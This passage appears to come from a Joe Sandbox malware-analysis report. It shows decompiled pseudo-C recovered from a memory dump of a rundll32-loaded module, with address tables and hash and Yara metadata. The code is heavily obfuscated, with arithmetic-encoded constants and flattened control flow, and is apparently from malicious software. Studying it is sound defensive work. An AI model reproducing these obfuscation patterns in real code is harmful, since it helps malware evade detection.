                                                                                                                                    										E002D0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
                                                                                                                                    										_t428 = _t428 + 0x10;
                                                                                                                                    										_t382 = 0x73dcb22;
                                                                                                                                    										goto L1;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					goto L27;
                                                                                                                                    					L24:
                                                                                                                                    					__eflags = _t382 - 0xd4a25d5;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L27;
                                                                                                                                    			}

                                                                                                                                    0x002c265b
                                                                                                                                    0x002c2660
                                                                                                                                    0x002c2668
                                                                                                                                    0x002c2674
                                                                                                                                    0x002c267c
                                                                                                                                    0x002c2680
                                                                                                                                    0x002c2685
                                                                                                                                    0x002c268d
                                                                                                                                    0x002c2695
                                                                                                                                    0x002c269d
                                                                                                                                    0x002c26aa
                                                                                                                                    0x002c26ae
                                                                                                                                    0x002c26b6
                                                                                                                                    0x002c26be
                                                                                                                                    0x002c26c6
                                                                                                                                    0x002c26d3
                                                                                                                                    0x002c26d7
                                                                                                                                    0x002c26dc
                                                                                                                                    0x002c26e4
                                                                                                                                    0x002c26ef
                                                                                                                                    0x002c26fa
                                                                                                                                    0x002c26fa
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2705
                                                                                                                                    0x002c2707
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c270d
                                                                                                                                    0x002c282a
                                                                                                                                    0x002c282f
                                                                                                                                    0x002c2832
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2713
                                                                                                                                    0x002c2719
                                                                                                                                    0x002c2808
                                                                                                                                    0x002c280a
                                                                                                                                    0x002c280d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c271f
                                                                                                                                    0x002c2725
                                                                                                                                    0x002c27f2
                                                                                                                                    0x002c27f7
                                                                                                                                    0x002c27fa
                                                                                                                                    0x00000000
                                                                                                                                    0x002c272b
                                                                                                                                    0x002c2731
                                                                                                                                    0x002c27c0
                                                                                                                                    0x002c27c5
                                                                                                                                    0x002c27c8
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2733
                                                                                                                                    0x002c2739
                                                                                                                                    0x002c278b
                                                                                                                                    0x002c2790
                                                                                                                                    0x002c2793
                                                                                                                                    0x00000000
                                                                                                                                    0x002c273b
                                                                                                                                    0x002c2741
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2747
                                                                                                                                    0x002c2756
                                                                                                                                    0x002c2757
                                                                                                                                    0x002c2758
                                                                                                                                    0x002c275d
                                                                                                                                    0x002c2763
                                                                                                                                    0x002c2769
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2769
                                                                                                                                    0x002c2763
                                                                                                                                    0x002c2741
                                                                                                                                    0x002c2739
                                                                                                                                    0x002c2731
                                                                                                                                    0x002c2725
                                                                                                                                    0x002c2719
                                                                                                                                    0x002c293e
                                                                                                                                    0x002c2940
                                                                                                                                    0x002c2945
                                                                                                                                    0x002c2945
                                                                                                                                    0x002c294f
                                                                                                                                    0x002c294f
                                                                                                                                    0x002c283c
                                                                                                                                    0x002c2842
                                                                                                                                    0x002c28fd
                                                                                                                                    0x002c2902
                                                                                                                                    0x002c2905
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2848
                                                                                                                                    0x002c2848
                                                                                                                                    0x002c284e
                                                                                                                                    0x002c2936
                                                                                                                                    0x002c2854
                                                                                                                                    0x002c2854
                                                                                                                                    0x002c2856
                                                                                                                                    0x002c28d3
                                                                                                                                    0x002c28d6
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2858
                                                                                                                                    0x002c2858
                                                                                                                                    0x002c285e
                                                                                                                                    0x002c28ba
                                                                                                                                    0x002c28bf
                                                                                                                                    0x002c28c2
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2860
                                                                                                                                    0x002c2860
                                                                                                                                    0x002c2866
                                                                                                                                    0x00000000
                                                                                                                                    0x002c286c
                                                                                                                                    0x002c2889
                                                                                                                                    0x002c288e
                                                                                                                                    0x002c2891
                                                                                                                                    0x00000000
                                                                                                                                    0x002c2891
                                                                                                                                    0x002c2866
                                                                                                                                    0x002c285e
                                                                                                                                    0x002c2856
                                                                                                                                    0x002c284e
                                                                                                                                    0x00000000
                                                                                                                                    0x002c290a
                                                                                                                                    0x002c290a
                                                                                                                                    0x002c290a
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                                    • API String ID: 0-245365489
                                                                                                                                    • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                    • Instruction ID: a82cd49a131e32be59616365e9012565fc928a0840a1bb78cc01e30e2eff78b7
                                                                                                                                    • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                    • Instruction Fuzzy Hash: BDF13271518381DFD368CF61C589A5BFBE1FBD4348F108A1DF29A86261DBB18958CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C9714(void* __ecx, void* __edx) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				void* _t251;
                                                                                                                                    				intOrPtr _t252;
                                                                                                                                    				intOrPtr _t253;
                                                                                                                                    				void* _t257;
                                                                                                                                    				signed int _t259;
                                                                                                                                    				signed int _t260;
                                                                                                                                    				signed int _t261;
                                                                                                                                    				signed int _t262;
                                                                                                                                    				signed int _t263;
                                                                                                                                    				signed int _t264;
                                                                                                                                    				void* _t292;
                                                                                                                                    				void* _t293;
                                                                                                                                    				signed int* _t296;
                                                                                                                                    				signed int* _t297;
                                                                                                                                    
                                                                                                                                    				_t296 =  &_v104;
                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                    				_v12 = 0xc5b764;
                                                                                                                                    				_v8 = 0xb6da07;
                                                                                                                                    				_v100 = 0x6b81aa;
                                                                                                                                    				_v100 = _v100 ^ 0x5133456b;
                                                                                                                                    				_t8 =  &_v100; // 0x5133456b
                                                                                                                                    				_v100 =  *_t8 * 0x6e;
                                                                                                                                    				_t292 = __edx;
                                                                                                                                    				_v100 = _v100 << 0xa;
                                                                                                                                    				_v100 = _v100 ^ 0x922ec96f;
                                                                                                                                    				_t257 = __ecx;
                                                                                                                                    				_v20 = 0x2c208b;
                                                                                                                                    				_t293 = 0x52ffaa2;
                                                                                                                                    				_v20 = _v20 + 0xffff37e6;
                                                                                                                                    				_v20 = _v20 ^ 0x00212911;
                                                                                                                                    				_v60 = 0xb21c01;
                                                                                                                                    				_v60 = _v60 ^ 0x31980a41;
                                                                                                                                    				_v60 = _v60 + 0xffff033c;
                                                                                                                                    				_v60 = _v60 ^ 0x31255444;
                                                                                                                                    				_v64 = 0x612501;
                                                                                                                                    				_v64 = _v64 << 2;
                                                                                                                                    				_v64 = _v64 + 0xf44;
                                                                                                                                    				_v64 = _v64 ^ 0x018d6347;
                                                                                                                                    				_v52 = 0x111460;
                                                                                                                                    				_v52 = _v52 + 0xffffc2ff;
                                                                                                                                    				_v52 = _v52 | 0x8d441097;
                                                                                                                                    				_v52 = _v52 ^ 0x8d5fe5cb;
                                                                                                                                    				_v56 = 0xb6e38a;
                                                                                                                                    				_t259 = 0x67;
                                                                                                                                    				_v56 = _v56 / _t259;
                                                                                                                                    				_t260 = 0x41;
                                                                                                                                    				_v56 = _v56 * 0x32;
                                                                                                                                    				_v56 = _v56 ^ 0x00536033;
                                                                                                                                    				_v96 = 0xaa1e09;
                                                                                                                                    				_v96 = _v96 / _t260;
                                                                                                                                    				_t261 = 0x73;
                                                                                                                                    				_v96 = _v96 * 0xd;
                                                                                                                                    				_v96 = _v96 / _t261;
                                                                                                                                    				_v96 = _v96 ^ 0x00047537;
                                                                                                                                    				_v88 = 0xebbfc;
                                                                                                                                    				_v88 = _v88 << 7;
                                                                                                                                    				_v88 = _v88 | 0x3053ba58;
                                                                                                                                    				_t262 = 0x7f;
                                                                                                                                    				_v88 = _v88 / _t262;
                                                                                                                                    				_v88 = _v88 ^ 0x006c206b;
                                                                                                                                    				_v44 = 0xece271;
                                                                                                                                    				_v44 = _v44 + 0xffff86ef;
                                                                                                                                    				_v44 = _v44 + 0x6a70;
                                                                                                                                    				_v44 = _v44 ^ 0x00eb9b45;
                                                                                                                                    				_v48 = 0xd70038;
                                                                                                                                    				_v48 = _v48 | 0x378b661e;
                                                                                                                                    				_v48 = _v48 ^ 0xfc23f8e2;
                                                                                                                                    				_v48 = _v48 ^ 0xcbf8b4c1;
                                                                                                                                    				_v92 = 0x86f3ef;
                                                                                                                                    				_v92 = _v92 << 0xd;
                                                                                                                                    				_v92 = _v92 >> 0xd;
                                                                                                                                    				_v92 = _v92 + 0x4513;
                                                                                                                                    				_v92 = _v92 ^ 0x000ef1b6;
                                                                                                                                    				_v80 = 0x7a204;
                                                                                                                                    				_v80 = _v80 + 0xffffa60a;
                                                                                                                                    				_v80 = _v80 | 0x4d150135;
                                                                                                                                    				_v80 = _v80 + 0xffff9d32;
                                                                                                                                    				_v80 = _v80 ^ 0x4d179d3b;
                                                                                                                                    				_v40 = 0x124198;
                                                                                                                                    				_v40 = _v40 ^ 0x5335feb3;
                                                                                                                                    				_t263 = 0x78;
                                                                                                                                    				_v40 = _v40 * 0x18;
                                                                                                                                    				_v40 = _v40 ^ 0xcbb00a78;
                                                                                                                                    				_v84 = 0xcaa24a;
                                                                                                                                    				_v84 = _v84 * 0x42;
                                                                                                                                    				_v84 = _v84 ^ 0x45be5790;
                                                                                                                                    				_v84 = _v84 + 0xffff0d2f;
                                                                                                                                    				_v84 = _v84 ^ 0x718e360f;
                                                                                                                                    				_v24 = 0x4d7038;
                                                                                                                                    				_v24 = _v24 | 0x28b75b7a;
                                                                                                                                    				_v24 = _v24 ^ 0x28f4655f;
                                                                                                                                    				_v28 = 0x844762;
                                                                                                                                    				_v28 = _v28 ^ 0xe0e1df8a;
                                                                                                                                    				_v28 = _v28 ^ 0xe064bc9e;
                                                                                                                                    				_v32 = 0xfc2930;
                                                                                                                                    				_v32 = _v32 / _t263;
                                                                                                                                    				_v32 = _v32 ^ 0x00028374;
                                                                                                                                    				_v104 = 0xce3f74;
                                                                                                                                    				_v104 = _v104 + 0x3224;
                                                                                                                                    				_v104 = _v104 + 0x85ca;
                                                                                                                                    				_t264 = 0xe;
                                                                                                                                    				_v104 = _v104 / _t264;
                                                                                                                                    				_v104 = _v104 ^ 0x0007887d;
                                                                                                                                    				_v68 = 0x11fdc1;
                                                                                                                                    				_v68 = _v68 | 0x0fd109af;
                                                                                                                                    				_t265 = 0x52;
                                                                                                                                    				_v68 = _v68 / _t265;
                                                                                                                                    				_v68 = _v68 ^ 0x00367c27;
                                                                                                                                    				_v72 = 0xa9a7e;
                                                                                                                                    				_v72 = _v72 * 0x16;
                                                                                                                                    				_v72 = _v72 ^ 0xca0bce5f;
                                                                                                                                    				_v72 = _v72 ^ 0xcae4b7d2;
                                                                                                                                    				_v76 = 0xb2d6c0;
                                                                                                                                    				_v76 = _v76 + 0xffff5dcd;
                                                                                                                                    				_v76 = _v76 >> 0xe;
                                                                                                                                    				_v76 = _v76 >> 4;
                                                                                                                                    				_v76 = _v76 ^ 0x0002e66e;
                                                                                                                                    				_v16 = 0x41627;
                                                                                                                                    				_v16 = _v16 + 0xccf7;
                                                                                                                                    				_v16 = _v16 ^ 0x00091dff;
                                                                                                                                    				_v36 = 0xd94625;
                                                                                                                                    				_v36 = _v36 + 0x741;
                                                                                                                                    				_v36 = _v36 << 0x10;
                                                                                                                                    				_v36 = _v36 ^ 0x4d68793e;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t251 = 0xc3f018b;
                                                                                                                                    					do {
                                                                                                                                    						L2:
                                                                                                                                    						while(_t293 != 0x52ffaa2) {
                                                                                                                                    							if(_t293 == 0x865547f) {
                                                                                                                                    								_t265 = _v80;
                                                                                                                                    								_t252 = E002CCDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                    								_t296 =  &(_t296[2]);
                                                                                                                                    								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
                                                                                                                                    								__eflags = _t252;
                                                                                                                                    								_t251 = 0xc3f018b;
                                                                                                                                    								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t293 == 0xb133873) {
                                                                                                                                    								_push(_v64);
                                                                                                                                    								_t253 = E002DC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
                                                                                                                                    								_t297 =  &(_t296[4]);
                                                                                                                                    								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
                                                                                                                                    								__eflags = _t253;
                                                                                                                                    								if(_t253 != 0) {
                                                                                                                                    									E002C7B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
                                                                                                                                    									_push( *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                    									_push(_v92);
                                                                                                                                    									_push(_v48);
                                                                                                                                    									_t265 = _v88;
                                                                                                                                    									E002C7C37(_v88, _v44);
                                                                                                                                    									_t296 =  &(_t297[6]);
                                                                                                                                    									_t293 = 0x865547f;
                                                                                                                                    									goto L1;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t293 == 0xb7a2405) {
                                                                                                                                    									return E002D9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                    								}
                                                                                                                                    								if(_t293 != _t251) {
                                                                                                                                    									goto L13;
                                                                                                                                    								} else {
                                                                                                                                    									_t253 = E002C46BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E002C219A, _v72);
                                                                                                                                    									_t296 =  &(_t296[0xa]);
                                                                                                                                    									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
                                                                                                                                    									if(_t253 == 0) {
                                                                                                                                    										_t293 = 0xb7a2405;
                                                                                                                                    										while(1) {
                                                                                                                                    											L1:
                                                                                                                                    											_t251 = 0xc3f018b;
                                                                                                                                    											goto L2;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							return _t253;
                                                                                                                                    						}
                                                                                                                                    						_t293 = 0xb133873;
                                                                                                                                    						L13:
                                                                                                                                    						__eflags = _t293 - 0x1aeb2e;
                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                    					return _t251;
                                                                                                                                    				}
                                                                                                                                    			}











































                                                                                                                                    0x002c98f8
                                                                                                                                    0x002c9907
                                                                                                                                    0x002c990a
                                                                                                                                    0x002c990e
                                                                                                                                    0x002c9916
                                                                                                                                    0x002c9923
                                                                                                                                    0x002c9927
                                                                                                                                    0x002c992f
                                                                                                                                    0x002c9937
                                                                                                                                    0x002c993f
                                                                                                                                    0x002c9947
                                                                                                                                    0x002c994f
                                                                                                                                    0x002c9957
                                                                                                                                    0x002c995f
                                                                                                                                    0x002c9967
                                                                                                                                    0x002c996f
                                                                                                                                    0x002c997f
                                                                                                                                    0x002c9983
                                                                                                                                    0x002c998b
                                                                                                                                    0x002c9993
                                                                                                                                    0x002c999b
                                                                                                                                    0x002c99a7
                                                                                                                                    0x002c99ac
                                                                                                                                    0x002c99b2
                                                                                                                                    0x002c99ba
                                                                                                                                    0x002c99c2
                                                                                                                                    0x002c99ce
                                                                                                                                    0x002c99d1
                                                                                                                                    0x002c99d5
                                                                                                                                    0x002c99dd
                                                                                                                                    0x002c99ea
                                                                                                                                    0x002c99ee
                                                                                                                                    0x002c99f6
                                                                                                                                    0x002c99fe
                                                                                                                                    0x002c9a06
                                                                                                                                    0x002c9a0e
                                                                                                                                    0x002c9a13
                                                                                                                                    0x002c9a18
                                                                                                                                    0x002c9a20
                                                                                                                                    0x002c9a28
                                                                                                                                    0x002c9a30
                                                                                                                                    0x002c9a38
                                                                                                                                    0x002c9a40
                                                                                                                                    0x002c9a48
                                                                                                                                    0x002c9a4d
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a5a
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a5a
                                                                                                                                    0x002c9a6c
                                                                                                                                    0x002c9b32
                                                                                                                                    0x002c9b36
                                                                                                                                    0x002c9b3b
                                                                                                                                    0x002c9b3e
                                                                                                                                    0x002c9b41
                                                                                                                                    0x002c9b45
                                                                                                                                    0x002c9b4a
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9b4a
                                                                                                                                    0x002c9a78
                                                                                                                                    0x002c9ac5
                                                                                                                                    0x002c9ad8
                                                                                                                                    0x002c9add
                                                                                                                                    0x002c9ae0
                                                                                                                                    0x002c9ae3
                                                                                                                                    0x002c9ae5
                                                                                                                                    0x002c9afd
                                                                                                                                    0x002c9b02
                                                                                                                                    0x002c9b05
                                                                                                                                    0x002c9b09
                                                                                                                                    0x002c9b11
                                                                                                                                    0x002c9b15
                                                                                                                                    0x002c9b1a
                                                                                                                                    0x002c9b1d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9b1d
                                                                                                                                    0x002c9a7a
                                                                                                                                    0x002c9a7c
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9b7a
                                                                                                                                    0x002c9a84
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a8a
                                                                                                                                    0x002c9aae
                                                                                                                                    0x002c9ab3
                                                                                                                                    0x002c9ab6
                                                                                                                                    0x002c9abb
                                                                                                                                    0x002c9ac1
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9a55
                                                                                                                                    0x002c9abb
                                                                                                                                    0x002c9a84
                                                                                                                                    0x002c9b82
                                                                                                                                    0x002c9b82
                                                                                                                                    0x002c9b52
                                                                                                                                    0x002c9b57
                                                                                                                                    0x002c9b57
                                                                                                                                    0x002c9b57
                                                                                                                                    0x00000000
                                                                                                                                    0x002c9a5a

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                                    • API String ID: 0-1622084174
                                                                                                                                    • Opcode ID: b03732c8954ea1ab182b22c442f9765aa6dc486a893ef2c54dba3f8eae89560b
                                                                                                                                    • Instruction ID: 53c14a2e2fbe62fbd17af8ae39f20f8471c9e618fb51ca14645c4112e019238a
                                                                                                                                    • Opcode Fuzzy Hash: b03732c8954ea1ab182b22c442f9765aa6dc486a893ef2c54dba3f8eae89560b
                                                                                                                                    • Instruction Fuzzy Hash: AEB13072908341AFC358CF25C58A90BFBE1BBC4758F108A1DF59A96220D3B5D969CF82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C64E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                    				char _v260;
                                                                                                                                    				signed int _v264;
                                                                                                                                    				intOrPtr _v268;
                                                                                                                                    				char _v276;
                                                                                                                                    				signed int _v280;
                                                                                                                                    				signed int _v284;
                                                                                                                                    				signed int _v288;
                                                                                                                                    				signed int _v292;
                                                                                                                                    				signed int _v296;
                                                                                                                                    				signed int _v300;
                                                                                                                                    				signed int _v304;
                                                                                                                                    				signed int _v308;
                                                                                                                                    				signed int _v312;
                                                                                                                                    				signed int _v316;
                                                                                                                                    				signed int _v320;
                                                                                                                                    				signed int _v324;
                                                                                                                                    				signed int _v328;
                                                                                                                                    				signed int _v332;
                                                                                                                                    				signed int _v336;
                                                                                                                                    				signed int _v340;
                                                                                                                                    				signed int _v344;
                                                                                                                                    				signed int _v348;
                                                                                                                                    				signed int _v352;
                                                                                                                                    				signed int _v356;
                                                                                                                                    				signed int _v360;
                                                                                                                                    				signed int _v364;
                                                                                                                                    				signed int _v368;
                                                                                                                                    				signed int _v372;
                                                                                                                                    				signed int _v376;
                                                                                                                                    				signed int _v380;
                                                                                                                                    				signed int _v384;
                                                                                                                                    				signed int _v388;
                                                                                                                                    				signed int _v392;
                                                                                                                                    				signed int _v396;
                                                                                                                                    				signed int _v400;
                                                                                                                                    				signed int _v404;
                                                                                                                                    				signed int _v408;
                                                                                                                                    				signed int _v412;
                                                                                                                                    				void* _t311;
                                                                                                                                    				void* _t332;
                                                                                                                                    				intOrPtr _t335;
                                                                                                                                    				intOrPtr _t338;
                                                                                                                                    				intOrPtr _t343;
                                                                                                                                    				void* _t345;
                                                                                                                                    				void* _t347;
                                                                                                                                    				void* _t349;
                                                                                                                                    				void* _t352;
                                                                                                                                    				intOrPtr _t359;
                                                                                                                                    				intOrPtr _t361;
                                                                                                                                    				intOrPtr* _t362;
                                                                                                                                    				intOrPtr _t364;
                                                                                                                                    				signed int _t367;
                                                                                                                                    				intOrPtr _t386;
                                                                                                                                    				intOrPtr _t387;
                                                                                                                                    				intOrPtr _t413;
                                                                                                                                    				signed int _t414;
                                                                                                                                    				signed int _t415;
                                                                                                                                    				signed int _t416;
                                                                                                                                    				signed int _t417;
                                                                                                                                    				signed int _t418;
                                                                                                                                    				signed int _t419;
                                                                                                                                    				signed int _t420;
                                                                                                                                    				signed int _t421;
                                                                                                                                    				signed int _t422;
                                                                                                                                    				void* _t423;
                                                                                                                                    				signed int* _t425;
                                                                                                                                    				void* _t427;
                                                                                                                                    
                                                                                                                                    				_push(_a24);
                                                                                                                                    				_t423 = __edx;
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t311);
                                                                                                                                    				_v264 = _v264 & 0x00000000;
                                                                                                                                    				_t425 =  &(( &_v412)[8]);
                                                                                                                                    				_v268 = 0x38f10b;
                                                                                                                                    				_v376 = 0x1d6e4;
                                                                                                                                    				_t364 = 0;
                                                                                                                                    				_v376 = _v376 + 0x2cf5;
                                                                                                                                    				_t367 = 0x349a1a2;
                                                                                                                                    				_v376 = _v376 + 0xffffbc4f;
                                                                                                                                    				_v376 = _v376 + 0xc828;
                                                                                                                                    				_v376 = _v376 ^ 0x000c4abe;
                                                                                                                                    				_v344 = 0xf0b614;
                                                                                                                                    				_t415 = 0x49;
                                                                                                                                    				_v344 = _v344 / _t415;
                                                                                                                                    				_v344 = _v344 ^ 0x0006b22b;
                                                                                                                                    				_v296 = 0xc48c2;
                                                                                                                                    				_v296 = _v296 >> 0xa;
                                                                                                                                    				_v296 = _v296 ^ 0x0001ad51;
                                                                                                                                    				_v384 = 0x7feda9;
                                                                                                                                    				_t416 = 0x39;
                                                                                                                                    				_v384 = _v384 * 0x1a;
                                                                                                                                    				_v384 = _v384 ^ 0x3da8c069;
                                                                                                                                    				_v384 = _v384 + 0xffff691b;
                                                                                                                                    				_v384 = _v384 ^ 0x315a0b75;
                                                                                                                                    				_v400 = 0x77d138;
                                                                                                                                    				_v400 = _v400 + 0xffff5a87;
                                                                                                                                    				_v400 = _v400 << 3;
                                                                                                                                    				_v400 = _v400 + 0xffff9ef2;
                                                                                                                                    				_v400 = _v400 ^ 0x03bdd381;
                                                                                                                                    				_v312 = 0x267902;
                                                                                                                                    				_v312 = _v312 | 0xf93e454e;
                                                                                                                                    				_v312 = _v312 ^ 0xf93fe769;
                                                                                                                                    				_v308 = 0x6d5338;
                                                                                                                                    				_v308 = _v308 ^ 0x3f4c4be5;
                                                                                                                                    				_v308 = _v308 ^ 0x3f211e75;
                                                                                                                                    				_v328 = 0x5e1da9;
                                                                                                                                    				_v328 = _v328 / _t416;
                                                                                                                                    				_v328 = _v328 ^ 0x000cc368;
                                                                                                                                    				_v364 = 0xd2dbf2;
                                                                                                                                    				_v364 = _v364 + 0xffffefaa;
                                                                                                                                    				_v364 = _v364 + 0xd543;
                                                                                                                                    				_v364 = _v364 ^ 0x00d6d9fb;
                                                                                                                                    				_v304 = 0x235f1e;
                                                                                                                                    				_t417 = 0x2e;
                                                                                                                                    				_v304 = _v304 / _t417;
                                                                                                                                    				_v304 = _v304 ^ 0x000b3ded;
                                                                                                                                    				_v320 = 0xc8231f;
                                                                                                                                    				_v320 = _v320 << 0xc;
                                                                                                                                    				_v320 = _v320 ^ 0x8237c00a;
                                                                                                                                    				_v356 = 0xee2c9b;
                                                                                                                                    				_v356 = _v356 ^ 0xa0da06c4;
                                                                                                                                    				_v356 = _v356 ^ 0xf246f640;
                                                                                                                                    				_v356 = _v356 ^ 0x52703357;
                                                                                                                                    				_v412 = 0xc100a3;
                                                                                                                                    				_v412 = _v412 ^ 0xb8e7c080;
                                                                                                                                    				_v412 = _v412 ^ 0xb6721a67;
                                                                                                                                    				_v412 = _v412 ^ 0xff44de7f;
                                                                                                                                    				_v412 = _v412 ^ 0xf11e2702;
                                                                                                                                    				_v396 = 0xa6af25;
                                                                                                                                    				_v396 = _v396 << 0x10;
                                                                                                                                    				_v396 = _v396 >> 7;
                                                                                                                                    				_v396 = _v396 + 0xffff7054;
                                                                                                                                    				_v396 = _v396 ^ 0x015ec427;
                                                                                                                                    				_v404 = 0x1f48c8;
                                                                                                                                    				_t418 = 0x2d;
                                                                                                                                    				_v404 = _v404 / _t418;
                                                                                                                                    				_v404 = _v404 << 0xb;
                                                                                                                                    				_v404 = _v404 | 0x7455ca98;
                                                                                                                                    				_v404 = _v404 ^ 0x75da0b0a;
                                                                                                                                    				_v368 = 0x174318;
                                                                                                                                    				_v368 = _v368 + 0x805d;
                                                                                                                                    				_v368 = _v368 ^ 0x0012ca04;
                                                                                                                                    				_v408 = 0x579c92;
                                                                                                                                    				_t419 = 0x65;
                                                                                                                                    				_v408 = _v408 * 0x61;
                                                                                                                                    				_v408 = _v408 ^ 0x6a2d4e62;
                                                                                                                                    				_v408 = _v408 + 0xd9d0;
                                                                                                                                    				_v408 = _v408 ^ 0x4b1c9053;
                                                                                                                                    				_v392 = 0x2598b2;
                                                                                                                                    				_v392 = _v392 * 0xd;
                                                                                                                                    				_v392 = _v392 ^ 0xb79fc0d8;
                                                                                                                                    				_v392 = _v392 + 0xffff9085;
                                                                                                                                    				_v392 = _v392 ^ 0xb671271d;
                                                                                                                                    				_v324 = 0x8734;
                                                                                                                                    				_v324 = _v324 + 0xffff82f4;
                                                                                                                                    				_v324 = _v324 ^ 0x000c0e93;
                                                                                                                                    				_v332 = 0x81f499;
                                                                                                                                    				_v332 = _v332 ^ 0xcb023f28;
                                                                                                                                    				_v332 = _v332 ^ 0xcb8aeffa;
                                                                                                                                    				_v340 = 0xbb3951;
                                                                                                                                    				_v340 = _v340 ^ 0x050a1ed9;
                                                                                                                                    				_v340 = _v340 ^ 0x05b74055;
                                                                                                                                    				_v372 = 0x5c4d3f;
                                                                                                                                    				_v372 = _v372 + 0xffffba18;
                                                                                                                                    				_v372 = _v372 | 0xc0b40c25;
                                                                                                                                    				_v372 = _v372 >> 3;
                                                                                                                                    				_v372 = _v372 ^ 0x1815f0ae;
